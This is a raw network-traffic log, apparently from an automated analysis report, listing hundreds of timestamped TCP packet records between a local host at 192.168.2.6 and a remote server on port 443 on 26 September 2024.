                                      Sep 26, 2024 10:58:05.318897963 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.319004059 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.319063902 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.319128990 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335088015 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335155010 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335226059 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335262060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335290909 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335313082 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335736990 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335800886 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335833073 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335845947 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.335871935 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.335896969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.336412907 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.336458921 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.336493969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.336507082 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.336533070 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.336564064 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.336997032 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337044001 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337076902 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.337089062 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337142944 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.337142944 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.337392092 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337439060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337471962 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.337485075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.337515116 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.337539911 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.357711077 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.357770920 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.357892036 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.357919931 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.357973099 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.357990980 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.387274981 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.387341976 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.387415886 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.387458086 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.387475014 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.387500048 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.406533003 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.406579018 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.406677008 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.406706095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.406733036 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.406749964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.422446012 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.422467947 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.422548056 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.422595024 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.422638893 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.423079014 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423105955 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423156977 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.423165083 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423198938 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.423754930 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423775911 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423810959 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.423823118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.423841000 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.423856974 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.424350977 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424370050 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424417019 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.424423933 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424458027 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.424659014 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424678087 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424725056 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.424731970 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.424768925 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.445045948 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.445101976 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.445178032 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.445214033 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.445231915 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.445264101 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.474708080 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.474756002 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.474972963 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.475040913 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.475112915 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.493962049 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.494028091 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.494096041 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.494112968 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.494131088 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.494162083 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510128021 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510163069 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510241985 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510270119 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510296106 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510315895 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510555029 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510574102 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510615110 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510627985 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.510654926 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.510673046 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.511687994 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.511706114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.511749983 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.511763096 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.511790037 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.511806965 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.512224913 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512243986 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512301922 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.512316942 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512367010 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.512563944 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512593031 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512629032 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.512641907 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.512674093 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.512695074 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.532809019 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.532845974 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.532919884 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.532943964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.532982111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.562426090 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.562452078 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.562625885 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.562712908 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.562772036 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.581435919 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.581458092 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.581576109 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.581587076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.581640959 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.597681999 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.597706079 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.597774982 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.597785950 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.597839117 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.598655939 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.598673105 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.598736048 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.598743916 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.598803997 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.598849058 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.599361897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.599378109 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.599416018 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.599423885 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.599446058 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.599462986 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.599896908 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.599915028 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.599963903 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.599978924 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600022078 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.600780010 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600795984 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600841999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.600855112 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600897074 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.619997978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620027065 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620116949 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.620134115 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620186090 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.650044918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650078058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650204897 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.650275946 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650371075 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.668983936 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669002056 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669203043 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.669231892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669286966 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.685225964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685245037 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685338020 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.685404062 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685458899 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686058044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686074972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686129093 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686137915 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686180115 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686681032 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686697960 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686754942 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686760902 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686806917 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687202930 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687220097 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687253952 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687261105 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687289000 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687308073 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687746048 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687763929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687825918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687825918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687834978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687874079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.707724094 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707755089 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707835913 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.707847118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707889080 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.746386051 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746409893 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746547937 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.746572971 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746644974 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.756546021 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756567001 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756700993 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.756716967 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756761074 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.772582054 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772598028 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772682905 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.772694111 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772744894 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.773536921 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773551941 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773611069 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.773617983 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773658991 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774127960 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774147987 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774195910 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774204016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774246931 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774817944 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774835110 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774887085 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774894953 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774950027 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.775353909 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775369883 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775422096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.775429964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775468111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.795222044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795238972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795305967 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.795341015 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795388937 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.833803892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.833820105 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.833930969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.833972931 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.834018946 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.843955040 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.843970060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.844043016 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.844080925 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.844099998 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.844136953 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.860080957 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860097885 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860333920 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.860378981 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860430002 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861063004 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861078978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861154079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861174107 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861233950 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861588955 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861604929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861656904 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861670017 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861704111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862349033 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862365007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862431049 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862453938 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862498999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862834930 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862850904 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862893105 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862903118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862940073 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.882769108 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882800102 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882893085 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.882939100 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882988930 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.921588898 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921623945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921778917 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.921832085 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921885967 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.931392908 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931416988 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931493044 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.931534052 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931591034 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.947484970 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947503090 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947599888 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.947635889 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947678089 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.948437929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948461056 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948517084 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.948525906 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948570013 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949037075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949054956 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949107885 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949115992 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949151993 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949836016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949851036 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949899912 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949911118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949958086 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.950251102 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950267076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950313091 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.950320959 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950355053 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.970144033 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970168114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970247984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.970288992 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970334053 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.009068012 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009085894 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009200096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.009239912 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009287119 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.018971920 CEST44349711207.241.227.240192.168.2.6
